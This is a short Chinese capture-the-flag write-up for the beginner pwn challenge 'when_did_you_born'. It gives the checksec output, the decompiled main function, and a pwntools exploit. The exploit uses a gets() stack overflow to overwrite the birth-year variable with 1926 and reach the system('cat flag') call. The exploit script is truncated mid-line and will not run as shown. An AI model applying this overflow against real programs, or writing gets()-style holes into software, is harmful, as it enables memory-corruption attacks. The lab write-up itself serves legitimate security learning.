『攻防世界』：新手区 | when_did_you_born

#之前这题的解题已经写完不小心被我删了。这里重新写上 = =！

checksec：

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

IDA：

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 result; // rax
  char v4; // [rsp+0h] [rbp-20h]
  unsigned int v5; // [rsp+8h] [rbp-18h]
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("What's Your Birth?");
  __isoc99_scanf("%d", &v5);
  while ( getchar() != 10 )
    ;
  if ( v5 == 1926 )
  {
    puts("You Cannot Born In 1926!");
    result = 0LL;
  }
  else
  {
    puts("What's Your Name?");
    gets(&v4);
    printf("You Are Born In %d
", v5);
    if ( v5 == 1926 )
    {
      puts("You Shall Have Flag.");
      system("cat flag");
    }
    else
    {
      puts("You Are Naive.");
      puts("You Speed One Second Here.");
    }
    result = 0LL;
  }
  return result;
}

这题思路很简单，首先输入的出生年份不能能为1926，但是进入else函数后需要出生年份为1926就可以得到flag，这里在输入名字的时候溢出覆盖年份的值为1926就可以了

exp：

from pwn import *

io = remote("ipaddr",port)
io.sendlineafter('Birth?','beef')
payload = b'a'*8 + p64(0x789)
io.sendlineafter('Name?',payload

『攻防世界』：新手区 | when_did_you_born

相关推荐